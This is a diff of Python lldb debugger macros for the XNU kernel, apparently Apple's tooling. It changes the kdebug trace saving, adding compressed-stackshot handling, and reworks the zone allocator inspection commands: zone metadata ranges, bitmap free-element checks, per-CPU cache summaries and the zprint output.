+    if (ctrl.kdebug_flags & xnudefines.KDBG_WRAPPED) != 0:
+        # TODO Yield a wrap event with the barrier_min timestamp.
+        pass
+
+    # Merge sort all events from all CPUs.
+    cpus = [KDCPU(cpuid) for cpuid in range(ctrl.kdebug_cpus)]
+
+    for event in heapq.merge(*cpus):
+        yield event.get_kevent()
 
 
 def GetKdebugEvent(event):
@@ -476,7 +496,7 @@ def SaveKdebugTrace(cmd_args=None, cmd_options={}):
                 continue
 
             event = process.ReadMemory(
-                    unsigned(addressof(event)), event_size, error)
+                    unsigned(event), event_size, error)
             file_offset += event_size
             f.write(event)
             written_nevents += 1
@@ -499,12 +519,30 @@ def SaveKdebugTrace(cmd_args=None, cmd_options={}):
         kcdata_length = unsigned(kcdata.kcd_length)
         if kcdata_addr != 0 and kcdata_length != 0:
             print('writing stackshot')
-            f.write(struct.pack(CHUNKHDR_PACK, SSHOT_TAG, 1, 0, kcdata_length))
-            file_offset += 16
             if verbose:
-                print('stackshot is {} bytes long'.format(kcdata_length))
                 print('stackshot starts at offset {}'.format(file_offset))
+                print('stackshot is {} bytes long'.format(kcdata_length))
             ssdata = process.ReadMemory(kcdata_addr, kcdata_length, error)
+            magic = struct.unpack('I', ssdata[:4])
+            if magic[0] == GetTypeForName('KCDATA_BUFFER_BEGIN_COMPRESSED'):
+                if verbose:
+                    print('found compressed stackshot')
+                iterator = kcdata_item_iterator(ssdata)
+                for item in iterator:
+                    kcdata_buffer = KCObject.FromKCItem(item)
+                    if isinstance(kcdata_buffer, KCCompressedBufferObject):
+                        kcdata_buffer.ReadItems(iterator)
+                        decompressed = kcdata_buffer.Decompress(ssdata)
+                        ssdata = decompressed
+                        kcdata_length = len(ssdata)
+                        if verbose:
+                            print(
+                                    'compressed stackshot is {} bytes long'.
+                                    format(kcdata_length))
+
+            f.write(struct.pack(CHUNKHDR_PACK, SSHOT_TAG, 1, 0, kcdata_length))
+            file_offset += 16
+
             f.write(ssdata)
             file_offset += kcdata_length
             if verbose:
index 93e85f7590ea7c0408a80ab8ec5fb6cc0f84e7f8..e9120e03d179f99aab7a59d9d94f44a740144a63 100755 (executable)
@@ -39,8 +39,7 @@ def MBufStat(cmd_args=None):
                                   (mcs.mbcl_total - total - mcs.mbcl_infree),
                                   mcs.mbcl_fail_cnt, mbuf.mtbl_cache.mc_waiter_cnt,
                                   mcs.mbcl_notified, mcs.mbcl_purge_cnt,
-                                  mbuf.mtbl_maxlimit
-                                  )
+                                  mbuf.mtbl_maxlimit)
 # EndMacro: mbuf_stat
 
 # Macro: mbuf_walkpkt
index be557e7b8059875907f71487a64b70cd3838d963..8f62be95675e9229a5cdaba286c32c8376247741 100755 (executable)
@@ -31,18 +31,31 @@ def vm_unpack_pointer(packed, params, type_str = 'void *'):
         addr >>= 64 - bits - shift
     return kern.GetValueFromAddress(addr, type_str)
 
-def IterateZPerCPU(root, element_type):
+def GetZPerCPU(root, cpu, element_type = None):
     """ Iterates over a percpu variable
         params:
             root         - value : Value object for per-cpu variable
+            cpu          - int   : the CPU number
             element_type - str   : Type of element
         returns:
             one slot
     """
     pagesize = kern.globals.page_size
     mangle   = 1 << (8 * kern.ptrsize - 1)
+    if element_type is None:
+        element_type = root.GetSBValue().GetType()
+    return kern.GetValueFromAddress((int(root) | mangle) + cpu * pagesize, element_type)
+
+def IterateZPerCPU(root, element_type = None):
+    """ Iterates over a percpu variable
+        params:
+            root         - value : Value object for per-cpu variable
+            element_type - str   : Type of element
+        returns:
+            one slot
+    """
     for i in range(0, kern.globals.zpercpu_early_count):
-        yield kern.GetValueFromAddress((int(root) | mangle) + i * pagesize, element_type)
+        yield GetZPerCPU(root, i, element_type)
 
 @lldb_command('showzpcpu', "S")
 def ShowZPerCPU(cmd_args=None, cmd_options={}):
@@ -226,25 +239,24 @@ class ZoneMeta(object):
     Helper class that helpers walking metadata
     """
 
-    @classmethod
-    def _looksForeign(cls, addr):
-        if addr & (kern.globals.page_size - 1):
-            return False
-        try:
-            meta = kern.GetValueFromAddress(addr, "struct zone_page_metadata *")
-            return meta.zm_foreign_cookie[0] == 0x123456789abcdef
-        except:
-            return False
-
     def __init__(self, addr, isPageIndex = False):
         global kern
         pagesize  = kern.globals.page_size
         zone_info = kern.GetGlobalVariable('zone_info')
 
-        self.zone_map_min   = unsigned(zone_info.zi_map_range.min_address)
-        self.zone_map_max   = unsigned(zone_info.zi_map_range.max_address)
-        self.zone_meta_min  = unsigned(zone_info.zi_meta_range.min_address)
-        self.zone_meta_max  = unsigned(zone_info.zi_meta_range.max_address)
+        def load_range(var):
+            return (unsigned(var.min_address), unsigned(var.max_address))
+
+        def in_range(x, r):
+            return x >= r[0] and x <= r[1]
+
+        FOREIGN = GetEnumValue('zone_addr_kind_t', 'ZONE_ADDR_FOREIGN')
+        NATIVE  = GetEnumValue('zone_addr_kind_t', 'ZONE_ADDR_NATIVE')
+
+        self.meta_range = load_range(zone_info.zi_meta_range)
+        self.native_range = load_range(zone_info.zi_map_range[NATIVE])
+        self.foreign_range = load_range(zone_info.zi_map_range[FOREIGN])
+        self.addr_base = min(self.foreign_range[0], self.native_range[0])
 
         addr = unsigned(addr)
         if isPageIndex:
@@ -255,86 +267,146 @@ class ZoneMeta(object):
 
         self.address = addr
 
-        if self.zone_meta_min <= addr and addr < self.zone_meta_max:
+        if in_range(addr, self.meta_range):
             self.kind = 'Metadata'
-            addr -= (addr - self.zone_meta_min) % sizeof('struct zone_page_metadata')
+            addr -= addr % sizeof('struct zone_page_metadata')
             self.meta_addr = addr
             self.meta = kern.GetValueFromAddress(addr, "struct zone_page_metadata *")
 
-            self.page_addr = self.zone_map_min + ((addr - self.zone_meta_min) / sizeof('struct zone_page_metadata') * pagesize)
-            self.first_offset = 0
-        elif self.zone_map_min <= addr and addr < self.zone_map_max:
+            self.page_addr = self.addr_base + ((addr - self.meta_range[0]) / sizeof('struct zone_page_metadata') * pagesize)
+        elif in_range(addr, self.native_range) or in_range(addr, self.foreign_range):
             addr &= ~(pagesize - 1)
-            page_idx = (addr - self.zone_map_min) / pagesize
+            page_idx = (addr - self.addr_base) / pagesize
 
             self.kind = 'Element'
             self.page_addr = addr
-            self.meta_addr = self.zone_meta_min + page_idx * sizeof('struct zone_page_metadata')
+            self.meta_addr = self.meta_range[0] + page_idx * sizeof('struct zone_page_metadata')
             self.meta = kern.GetValueFromAddress(self.meta_addr, "struct zone_page_metadata *")
-            self.first_offset = 0
-        elif ZoneMeta._looksForeign(addr):
-            self.kind = 'Element (F)'
-            addr &= ~(pagesize - 1)
-            self.page_addr = addr
-            self.meta_addr = addr
-            self.meta = kern.GetValueFromAddress(addr, "struct zone_page_metadata *")
-            self.first_offset = 32 # ZONE_FOREIGN_PAGE_FIRST_OFFSET in zalloc.c
         else:
             self.kind = 'Unknown'
             self.meta = None
             self.page_addr = 0
             self.meta_addr = 0
-            self.first_offset = 0
+
+        if self.meta:
+            self.zone = addressof(kern.globals.zone_array[self.meta.zm_index])
+        else:
+            self.zone = None
 
     def isSecondaryPage(self):
-        return self.meta and self.meta.zm_secondary_page
+        return self.meta and self.meta.zm_chunk_len >= 0xe
 
     def getPageCount(self):
-        return self.meta and self.meta.zm_page_count or 0
+        n = self.meta and self.meta.zm_chunk_len or 0
+        if self.zone and self.zone.z_percpu:
+            n *= kern.globals.zpercpu_early_count
+        return n
+
+    def getAllocAvail(self):
+        if not self.meta: return 0
+        chunk_len = unsigned(self.meta.zm_chunk_len)
+        page_size = unsigned(kern.globals.page_size)
+        return chunk_len * page_size / self.zone.z_elem_size
 
     def getAllocCount(self):
-        return self.meta and self.meta.zm_alloc_count or 0
+        if not self.meta: return 0
+        return self.meta.zm_alloc_size / self.zone.z_elem_size
 
     def getReal(self):
         if self.isSecondaryPage():
-            return ZoneMeta(self.meta - self.meta.zm_page_count)
+            return ZoneMeta(unsigned(self.meta) - sizeof('struct zone_page_metadata') * unsigned(self.meta.zm_page_index))
 
         return self
 
-    def getFreeList(self):
-        if self.meta and self.meta.zm_freelist_offs != unsigned(0xffff):
-            return kern.GetValueFromAddress(self.page_addr + self.meta.zm_freelist_offs, 'vm_offset_t *')
-        return 0
+    def getElementAddress(self, addr):
+        meta  = self.getReal()
+        esize = meta.zone.z_elem_size
+        start = meta.page_addr
 
-    def iterateFreeList(self):
-        cur = self.getFreeList()
-        while cur:
-            yield cur
+        if esize == 0:
+            return None
+
+        estart = addr - start
+        return unsigned(start + estart - (estart % esize))
+
+    def getInlineBitmapChunkLength(self):
+        if self.zone.z_percpu:
+            return unsigned(self.zone.z_chunk_pages)
+        return unsigned(self.meta.zm_chunk_len)
+
+    def getBitmapSize(self):
+        if not self.meta or self.zone.z_permanent or not self.meta.zm_chunk_len:
+            return 0
+        if self.meta.zm_inline_bitmap:
+            return -4 * self.getInlineBitmapChunkLength()
+        return 8 << (unsigned(self.meta.zm_bitmap) & 0x7);
+
+    def getBitmap(self):
+        if not self.meta or self.zone.z_permanent or not self.meta.zm_chunk_len:
+            return 0
+        if self.meta.zm_inline_bitmap:
+            return unsigned(addressof(self.meta.zm_bitmap))
+        bbase = unsigned(kern.globals.zone_info.zi_bits_range.min_address)
+        index = unsigned(self.meta.zm_bitmap) & ~0x7
+        return bbase + index;
+
+    def getFreeCountSlow(self):
+        if not self.meta or self.zone.z_permanent or not self.meta.zm_chunk_len:
+            return self.getAllocAvail() - self.getAllocCount()
+
+        n = 0
+        if self.meta.zm_inline_bitmap:
+            for i in xrange(0, self.getInlineBitmapChunkLength()):
+                m = kern.GetValueFromAddress(self.meta_addr + i * 16,
+                    'struct zone_page_metadata *');
+                bits = unsigned(m.zm_bitmap)
+                while bits:
+                    n += 1
+                    bits &= bits - 1
+        else:
+            bitmap = kern.GetValueFromAddress(self.getBitmap(), 'uint64_t *')
+            for i in xrange(0, 1 << (unsigned(self.meta.zm_bitmap) & 0x7)):
+                bits = unsigned(bitmap[i])
+                while bits:
+                    n += 1
+                    bits &= bits - 1
+        return n
+
+    def isElementFree(self, addr):
+        meta = self.meta
+
+        if not meta or self.zone.z_permanent or not meta.zm_chunk_len:
+            return True
+
+        start = self.page_addr
+        esize = self.zone.z_elem_size
+        eidx  = (addr - start) / esize
+
+        if meta.zm_inline_bitmap:
+            i = eidx / 32
+            m = unsigned(meta) + sizeof('struct zone_page_metadata') * i
+            bits = kern.GetValueFromAddress(m, meta).zm_bitmap
+            return (bits & (1 << (eidx % 32))) != 0
 
-            cur = dereference(cast(cur, 'vm_offset_t *'))
-            cur = unsigned(cur) ^ unsigned(kern.globals.zp_nopoison_cookie)
-            cur = kern.GetValueFromAddress(cur, 'vm_offset_t *')
+        else:
+            bitmap = kern.GetValueFromAddress(self.getBitmap(), 'uint64_t *')
+            bits = unsigned(bitmap[eidx / 64])
+            return (bits & (1 << (eidx % 64))) != 0
 
     def iterateElements(self):
         if self.meta is None:
             return
-        esize = self.getZone().z_elem_size
-        offs  = self.first_offset
-        end   = kern.globals.page_size
-        if not self.meta.zm_percpu:
-            end *= self.meta.zm_page_count
+        esize = self.zone.z_elem_size
+        start = 0
+        end   = unsigned(kern.globals.page_size) * self.meta.zm_chunk_len
+        end  -= end % esize
 
-        while offs + esize <= end:
-            yield kern.GetValueFromAddress(self.page_addr + offs, 'void *')
-            offs += esize
-
-    def getZone(self):
-        if self.meta:
-            return kern.globals.zone_array[self.meta.zm_index]
-        return None
+        for offs in xrange(start, end, esize):
+            yield unsigned(self.page_addr + offs)
 
 @lldb_type_summary(['zone_page_metadata'])
-@header("{:<18s} {:<18s} {:>8s} {:>8s} {:<18s} {:<20s}".format('ZONE_METADATA', 'FREELIST', 'PG_CNT', 'ALLOC_CNT', 'ZONE', 'NAME'))
+@header("{:<20s} {:<10s} {:<10s} {:<24s} {:<20s} {:<20s}".format(
+    'METADATA', 'PG_CNT', 'ALLOC_CNT', 'BITMAP', 'ZONE', 'NAME'))
 def GetZoneMetadataSummary(meta):
     """ Summarize a zone metadata object
         params: meta - obj representing zone metadata in the kernel
@@ -346,66 +418,73 @@ def GetZoneMetadataSummary(meta):
 
     out_str = 'Metadata Description:\n' + GetZoneMetadataSummary.header + '\n'
     if meta.isSecondaryPage():
-        out_str += "{:#018x} {:#018x} {:8d} {:8d} {:#018x} {:s}\n".format(
-                meta.meta_addr, 0, 0, 0, 0, '(fake multipage meta)')
+        out_str += "{:<#20x} {:<10d} {:<10d} {:<#18x} @{:<4d} {:<#20x} {:s}\n".format(
+                meta.meta_addr, 0, 0, 0, 0, 0, '(fake multipage meta)')
         meta = meta.getReal()
-    zinfo = meta.getZone()
-    out_str += "{:#018x} {:#018x} {:8d} {:8d} {:#018x} {:s}".format(
-            meta.meta_addr, meta.getFreeList(), meta.getPageCount(), meta.getAllocCount(),
-            addressof(zinfo), ZoneName(zinfo))
+    out_str += "{:<#20x} {:<10d} {:<10d} {:<#18x} @{:<4d} {:<#20x} {:s}".format(
+            meta.meta_addr, meta.getPageCount(), meta.getAllocCount(),
+            meta.getBitmap(), meta.getBitmapSize(), meta.zone, ZoneName(meta.zone))
     return out_str
 
-@header("{:<18s} {:>10s}  {:>18s}  {:>18s} {:<10s}".format(
-    'ADDRESS', 'TYPE', 'METADATA', 'PAGE_ADDR', 'OFFSET'))
+@header("{:<20s} {:<10s} {:<10s} {:<20s} {:<10s}".format(
+    'ADDRESS', 'TYPE', 'STATUS', 'PAGE_ADDR', 'OFFSET'))
 def WhatIs(addr):
     """ Information about kernel pointer
     """
     global kern
 
     meta = ZoneMeta(addr)
+    estart = None
 
     if meta.meta is None:
         out_str = "Address {:#018x} is outside of any zone map ({:#018x}-{:#018x})\n".format(
-                addr, meta.zone_map_min, meta.zone_map_max)
+                addr, meta.native_range[0], meta.native_range[-1] + 1)
     else:
         if meta.kind[0] == 'E': # element
             page_offset_str = "{:d}/{:d}K".format(
                     addr - meta.page_addr, kern.globals.page_size / 1024)
+            estart = meta.getElementAddress(addr)
+            if estart is None:
+                status = "Unattributed"
+            elif meta.isElementFree(estart):
+                status = "Free"
+            else:
+                status = "Allocated"
         else:
             page_offset_str = "-"
+            status = "-"
         out_str = WhatIs.header + '\n'
-        out_str += "{meta.address:#018x} {meta.kind:>10s}  {meta.meta_addr:#018x}  {meta.page_addr:#018x} {:<10s}\n\n".format(
-                page_offset_str, meta=meta)
+        out_str += "{meta.address:<#20x} {meta.kind:<10s} {status:<10s} {meta.page_addr:<#20x} {:<10s}\n\n".format(
+                page_offset_str, meta=meta, status=status)
         out_str += GetZoneMetadataSummary(meta) + '\n\n'
 
     print out_str
 
-    if meta.kind[0] == 'E':
+    if estart is not None:
         print "Hexdump:\n"
 
-        meta  = meta.getReal()
-        esize = meta.getZone().z_elem_size
-        start = meta.page_addr
-
-        estart = addr - (start - meta.first_offset)
-        estart = start + estart - (estart % esize)
+        meta   = meta.getReal()
+        esize  = meta.zone.z_elem_size
+        start  = meta.page_addr
+        marks  = {unsigned(addr): ">"}
 
         try:
             if estart > start:
                 data_array = kern.GetValueFromAddress(estart - 16, "uint8_t *")
                 print_hex_data(data_array[0:16], estart - 16, "")
-                print "------------------------------------------------------------------"
         except:
             pass
 
+        print "------------------------------------------------------------------"
         try:
             data_array = kern.GetValueFromAddress(estart, "uint8_t *")
-            print_hex_data(data_array[0:esize], estart, "")
+            print_hex_data(data_array[0:esize], estart, "", marks)
         except:
+            print "*** unable to read memory ***"
             pass
+        print "------------------------------------------------------------------"
 
         try:
-            print "------------------------------------------------------------------"
             data_array = kern.GetValueFromAddress(estart + esize, "uint8_t *")
             print_hex_data(data_array[0:16], estart + esize, "")
         except:
@@ -423,97 +502,80 @@ def WhatIsHelper(cmd_args=None):
 # Macro: showzcache
 
 @lldb_type_summary(['zone','zone_t'])
-@header("{:<18s}  {:>5s}   {:>10s}  {:>12s} {:>12s} {:>9s} {:>9s} {:>9s} {:>9s} {:>9s}  {:<20s}".format(
-'ZONE', 'ELTS', 'D FULL/EMPTY', 'ALLOCS', 'FREES', 'D_SWAP', 'D_FILL', 'D_DRAIN', 'D_GC', 'D_FAIL', 'NAME'))
-
-def GetZoneCacheSummary(zone, O):
-    """ Summarize a zone's cache with important information.
-        params:
-          zone: value - obj representing a zone in kernel
-        returns:
-          str - summary of the zone's cache contents
-    """
-    format_string = '{:#018x}  {:>5d}    {:>4d} / {:>4d}  {:>12,d} {:>12,d} {:>9,d} {:>9,d} {:>9,d} {:>9,d} {:>9,d}  {:<20s}'
-    mag_capacity = kern.GetGlobalVariable('magazine_element_count')
-    depot_capacity = kern.GetGlobalVariable('depot_element_count')
-
-    cache_elem_count = 0
-    allocs = 0
-    frees  = 0
-
-    if zone.__getattr__('cpu_cache_enabled') :
-        for cache in IterateZPerCPU(zone.zcache.zcc_pcpu, 'struct zcc_per_cpu_cache *'):
-            cache_elem_count += cache.current.zcc_magazine_index
-            cache_elem_count += cache.previous.zcc_magazine_index
-            allocs += cache.zcc_allocs
-            frees  += cache.zcc_frees
-
-        depot = zone.zcache.zcc_depot
-        cache_elem_count += depot.zcc_depot_index * mag_capacity
-        print O.format(format_string, zone, cache_elem_count,
-                depot.zcc_depot_index, depot_capacity - depot.zcc_depot_index,
-                allocs, frees, depot.zcc_swap, depot.zcc_fill, depot.zcc_drain,
-                depot.zcc_gc, depot.zcc_fail, ZoneName(zone))
-
-@lldb_command('showzcache', fancy=True)
-def ZcachePrint(cmd_args=None, cmd_options={}, O=None):
-    """ Routine to print a summary listing of all the kernel zones cache contents
-    All columns are printed in decimal
-    """
-    global kern
-    with O.table(GetZoneCacheSummary.header):
-        for zval in kern.zones:
-            if zval.__getattr__('cpu_cache_enabled') :
-                GetZoneCacheSummary(zval, O)
-
-# EndMacro: showzcache
-
-# Macro: showzcachecpu
-
-@lldb_type_summary(['zone','zone_t'])
-@header("{:18s}  {:32s}  {:<10s}  {:<10s}".format(
-'ZONE', 'NAME', 'CACHE_ELTS', 'CPU_INFO'))
-
-def GetZoneCacheCPUSummary(zone, O):
+@header("{:18s}  {:32s}  {:>6s}  {:>6s}  {:>6s}  {:>6s}  {:>6s}  {:>6s}  {:<s}".format(
+    'ZONE', 'NAME', 'WSS', 'CONT', 'USED', 'FREE', 'CACHED', 'RECIRC', 'CPU_CACHES'))
+def GetZoneCacheCPUSummary(zone, verbose, O):
     """ Summarize a zone's cache broken up per cpu
         params:
           zone: value - obj representing a zone in kernel
         returns:
           str - summary of the zone's per CPU cache contents
     """
-    format_string = '{:#018x}  {:32s}  {:10d}  {cpuinfo:s}'
+    format_string  = '{zone:#018x}  {:32s}  '
+    format_string += '{zone.z_elems_free_wss:6d}  {cont:6.2f}  '
+    format_string += '{used:6d}  {zone.z_elems_free:6d}  '
+    format_string += '{cached:6d}  {recirc:6d}  {cpuinfo:s}'
     cache_elem_count = 0
     cpu_info = ""
-    per_cpu_count = 0
-    mag_capacity = kern.GetGlobalVariable('magazine_element_count')
+    mag_capacity = unsigned(kern.GetGlobalVariable('zc_magazine_size'))
     depot_capacity = kern.GetGlobalVariable('depot_element_count')
 
-    if zone.__getattr__('cpu_cache_enabled') :
-        i = 0
-        for cache in IterateZPerCPU(zone.zcache.zcc_pcpu, 'struct zcc_per_cpu_cache *'):
-            if i is not 0:
-                cpu_info += ", "
-            per_cpu_count = cache.current.zcc_magazine_index
-            per_cpu_count += cache.previous.zcc_magazine_index
-            cache_elem_count += per_cpu_count
-            cpu_info += "CPU {:d}: {:5}".format(i,per_cpu_count)
-            i += 1
-        cache_elem_count += zone.zcache.zcc_depot.zcc_depot_index * mag_capacity
-
-    print O.format(format_string, zone, ZoneName(zone), cache_elem_count,cpuinfo = cpu_info)
+    if zone.z_pcpu_cache:
+        if verbose:
+            cpu_info = None
+            for cache in IterateZPerCPU(zone.z_pcpu_cache):
+                if cpu_info is None:
+                    cpu_info = "{ "
+                else:
+                    cpu_info += ", "
+                per_cpu_count = unsigned(cache.zc_alloc_cur)
+                per_cpu_count += unsigned(cache.zc_free_cur)
+                per_cpu_count += unsigned(cache.zc_depot_cur) * mag_capacity
+                cache_elem_count += per_cpu_count
+                cpu_info += "{:3d} /{cache.zc_depot_max:3d}".format(per_cpu_count, cache=cache)
+            cpu_info += " }"
+        else:
+            depot_cur = 0
+            depot_max = 0
+            for cache in IterateZPerCPU(zone.z_pcpu_cache):
+                depot_cur += unsigned(cache.zc_alloc_cur)
+                depot_cur += unsigned(cache.zc_free_cur)
+                cache_elem_count += unsigned(cache.zc_depot_cur) * mag_capacity
+                depot_max += unsigned(cache.zc_depot_max)
+            cache_elem_count += depot_cur
+
+            cpus = unsigned(kern.globals.zpercpu_early_count)
+            cpu_info = "total: {:3d} / {:3d}, avg: {:5.1f} / {:5.1f}".format(
+                    depot_cur, depot_max, float(depot_cur) / cpus, float(depot_max) / cpus)
+
+
+    print O.format(format_string, ZoneName(zone), cached=cache_elem_count,
+            used=zone.z_elems_avail - cache_elem_count - zone.z_elems_free,
+            cont=float(zone.z_contention_wma) / 256.,
+            recirc=zone.z_recirc_cur * mag_capacity,
+            zone=zone, cpuinfo = cpu_info)
 
-@lldb_command('showzcachecpu', fancy=True)
+@lldb_command('showzcache', fancy=True)
 def ZcacheCPUPrint(cmd_args=None, cmd_options={}, O=None):
-    """ Routine to print a summary listing of all the kernel zones cache contents
-    All columns are printed in decimal
+    """
+    Routine to print a summary listing of all the kernel zones cache contents
+
+    Usage: showzcache [-V]
+
+    Use -V       to see more detailed output
     """
     global kern
+    verbose = "-V" in cmd_options
     with O.table(GetZoneCacheCPUSummary.header):
-        for zval in kern.zones:
-            if zval.__getattr__('cpu_cache_enabled'):
-                GetZoneCacheCPUSummary(zval, O)
+        if len(cmd_args) == 1:
+            zone = kern.GetValueFromAddress(cmd_args[0], 'struct zone *')
+            GetZoneCacheCPUSummary(zone, verbose, O);
+        else:
+            for zval in kern.zones:
+                if zval.z_self:
+                    GetZoneCacheCPUSummary(zval, verbose, O)
 
-# EndMacro: showzcachecpu
+# EndMacro: showzcache
 
 # Macro: zprint
 
@@ -524,26 +586,41 @@ def GetZone(zone_val, marks):
         returns:
           zone - python dictionary with zone stats
     """
+    pcpu_scale = 1
+    if zone_val.z_percpu:
+        pcpu_scale = unsigned(kern.globals.zpercpu_early_count)
     pagesize = kern.globals.page_size
     zone = {}
-    zone["free_size"] = zone_val.countfree * zone_val.pcpu_elem_size
-    mag_capacity = kern.GetGlobalVariable('magazine_element_count')
-    zone["page_count"] = unsigned(zone_val.page_count)
-    zone["allfree_page_count"] = unsigned(zone_val.allfree_page_count)
+    mag_capacity = unsigned(kern.GetGlobalVariable('zc_magazine_size'))
+    zone["page_count"] = unsigned(zone_val.z_wired_cur) * pcpu_scale
+    zone["allfree_page_count"] = unsigned(zone_val.z_wired_empty)
+
+    cache_elem_count = 0
+    if zone_val.z_pcpu_cache:
+        for cache in IterateZPerCPU(zone_val.z_pcpu_cache):
+            cache_elem_count += unsigned(cache.zc_alloc_cur)
+            cache_elem_count += unsigned(cache.zc_free_cur)
+            cache_elem_count += unsigned(cache.zc_depot_cur) * mag_capacity
+
+    zone["size"] = zone["page_count"] * pagesize
 
-    zone["size"] = zone_val.page_count * pagesize
-    zone["used_size"] = zone["size"] - zone["free_size"]
-    zone["element_count"] = zone_val.countavail - zone_val.countfree
+    zone["free_size"] = zone_val.z_elems_free * zone_val.z_elem_size * pcpu_scale
+    zone["cached_size"] = cache_elem_count * zone_val.z_elem_size * pcpu_scale
+    zone["used_size"] = zone["size"] - zone["free_size"] - zone["cached_size"]
 
-    if zone_val.percpu:
+    zone["element_count"] = zone_val.z_elems_avail - zone_val.z_elems_free - cache_elem_count
+    zone["cache_element_count"] = cache_elem_count
+    zone["free_element_count"] = zone_val.z_elems_free
+
+    if zone_val.z_percpu:
         zone["allocation_size"] = unsigned(pagesize)
-        zone["allocation_ncpu"] = unsigned(zone_val.alloc_pages)
+        zone["allocation_ncpu"] = unsigned(zone_val.z_chunk_pages)
     else:
-        zone["allocation_size"] = unsigned(zone_val.alloc_pages * pagesize)
+        zone["allocation_size"] = unsigned(zone_val.z_chunk_pages * pagesize)
         zone["allocation_ncpu"] = 1
     zone["allocation_count"] = zone["allocation_size"] / zone_val.z_elem_size
     zone["allocation_waste"] = (zone["allocation_size"] % zone_val.z_elem_size) * zone["allocation_ncpu"]
-    
+
     if not zone_val.__getattr__("z_self") :
         zone["destroyed"] = True
     else:
@@ -555,30 +632,24 @@ def GetZone(zone_val, marks):
         else:
             zone[mark[0]] = False
 
-    cache_elem_count = 0
-    if zone_val.__getattr__('cpu_cache_enabled') :
-        for cache in IterateZPerCPU(zone_val.zcache.zcc_pcpu, 'struct zcc_per_cpu_cache *'):
-            cache_elem_count += cache.current.zcc_magazine_index
-            cache_elem_count += cache.previous.zcc_magazine_index
-        cache_elem_count += zone_val.zcache.zcc_depot.zcc_depot_index * mag_capacity
-    zone["cache_element_count"] = cache_elem_count
     zone["name"] = ZoneName(zone_val)
     if zone_val.exhaustible:
         zone["exhaustible"] = True
     else:
         zone["exhaustible"] = False
 
-    zone["sequester_page_count"] = unsigned(zone_val.sequester_page_count)
-    zone["page_count_max"] = unsigned(zone_val.page_count_max)
+    zone["sequester_page_count"] = (unsigned(zone_val.z_va_cur) -
+            unsigned(zone_val.z_wired_cur)) * pcpu_scale
+    zone["page_count_max"] = unsigned(zone_val.z_wired_max) * pcpu_scale
 
     return zone
 
 
 @lldb_type_summary(['zone','zone_t'])
-@header(("{:<18s}  {:_^35s}  {:_^24s}  {:_^13s}  {:_^28s}\n"+
-"{:<18s}  {:>11s} {:>11s} {:>11s}  {:>8s} {:>7s} {:>7s}  {:>6s} {:>6s}  {:>8s} {:>6s} {:>5s} {:>7s}   {:<18s} {:<20s}").format(
+@header(("{:<18s}  {:_^47s}  {:_^24s}  {:_^13s}  {:_^28s}\n"+
+"{:<18s}  {:>11s} {:>11s} {:>11s} {:>11s}  {:>8s} {:>7s} {:>7s}  {:>6s} {:>6s}  {:>8s} {:>6s} {:>5s} {:>7s}   {:<18s} {:<20s}").format(
 '', 'SIZE (bytes)', 'ELEMENTS (#)', 'PAGES', 'ALLOC CHUNK CONFIG',
-'ZONE', 'TOTAL', 'ALLOC', 'FREE', 'ALLOC', 'FREE', 'CACHE', 'COUNT', 'FREE', 'SIZE (P)', 'ELTS', 'WASTE', 'ELT_SZ', 'FLAGS', 'NAME'))
+'ZONE', 'TOTAL', 'ALLOC', 'CACHE', 'FREE', 'ALLOC', 'CACHE', 'FREE', 'COUNT', 'FREE', 'SIZE (P)', 'ELTS', 'WASTE', 'ELT_SZ', 'FLAGS', 'NAME'))
 def GetZoneSummary(zone_val, marks, stats):
     """ Summarize a zone with important information. See help zprint for description of each field
         params:
@@ -590,16 +661,21 @@ def GetZoneSummary(zone_val, marks, stats):
     out_string = ""
     zone = GetZone(zone_val, marks)
 
-    format_string  = '{zone:#018x}  {cur_size:11,d} {used_size:11,d} {free_size:11,d}  '
-    format_string += '{count_elts:8,d} {zone.countfree:7,d} {cache_elem_count:7,d}  '
-    format_string += '{zone.page_count:6,d} {zone.allfree_page_count:6,d}  '
-    format_string += '{alloc_size_kb:3,d}K ({zone.alloc_pages:d}) {alloc_count:6,d} {alloc_waste:5,d} {zone.pcpu_elem_size:7,d}   '
+    pcpu_scale = 1
+    if zone_val.z_percpu:
+        pcpu_scale = unsigned(kern.globals.zpercpu_early_count)
+
+    format_string  = '{zone:#018x}  {zd[size]:11,d} {zd[used_size]:11,d} {zd[cached_size]:11,d} {zd[free_size]:11,d}  '
+    format_string += '{zd[element_count]:8,d} {zd[cache_element_count]:7,d} {zone.z_elems_free:7,d}  '
+    format_string += '{z_wired_cur:6,d} {z_wired_empty:6,d}  '
+    format_string += '{alloc_size_kb:3,d}K ({zone.z_chunk_pages:d}) '
+    format_string += '{zd[allocation_count]:6,d} {zd[allocation_waste]:5,d} {z_elem_size:7,d}   '
     format_string += '{markings:<18s} {zone_name:<20s}'
 
     markings=""
     if zone["destroyed"]:
         markings+="I"
-        
+
     for mark in marks:
         if zone[mark[0]]:
             markings += mark[1]
@@ -607,10 +683,11 @@ def GetZoneSummary(zone_val, marks, stats):
             markings+=" "
 
     alloc_size_kb = zone["allocation_size"] / 1024
-    out_string += format_string.format(zone=zone_val, free_size=zone["free_size"], used_size=zone["used_size"],
-            cur_size=zone["size"], count_elts=zone["element_count"], cache_elem_count=zone["cache_element_count"],
-            alloc_count=zone["allocation_count"], alloc_size_kb=alloc_size_kb, alloc_waste=zone["allocation_waste"],
-            markings=markings, zone_name=zone["name"])
+    out_string += format_string.format(zone=zone_val, zd=zone,
+            z_wired_cur=unsigned(zone_val.z_wired_cur) * pcpu_scale,
+            z_wired_empty=unsigned(zone_val.z_wired_empty) * pcpu_scale,
+            z_elem_size=unsigned(zone_val.z_elem_size) * pcpu_scale,
+            alloc_size_kb=alloc_size_kb, markings=markings, zone_name=zone["name"])
 
     if zone["exhaustible"] :
             out_string += " (max: {:d})".format(zone["page_count_max"] * pagesize)
@@ -620,6 +697,7 @@ def GetZoneSummary(zone_val, marks, stats):
 
     stats["cur_size"] += zone["size"]
     stats["used_size"] += zone["used_size"]
+    stats["cached_size"] += zone["cached_size"]
     stats["free_size"] += zone["free_size"]
     stats["cur_pages"] += zone["page_count"]
     stats["free_pages"] += zone["allfree_page_count"]
@@ -634,46 +712,50 @@ def Zprint(cmd_args=None, cmd_options={}, O=None):
                 Output json
     All columns are printed in decimal
     Legend:
+        ! - zone uses VA sequestering
+        $ - not encrypted during hibernation
+        A - currently trying to allocate more backing memory from kernel_memory_allocate without VM priv
         C - collectable
         D - destructible
-        X - expandable
-        $ - not encrypted during hibernation
-        H - exhaustible
+        E - Per-cpu caching is enabled for this zone
         F - allows foreign memory (memory not allocated from any zone map)
+        G - currently running GC
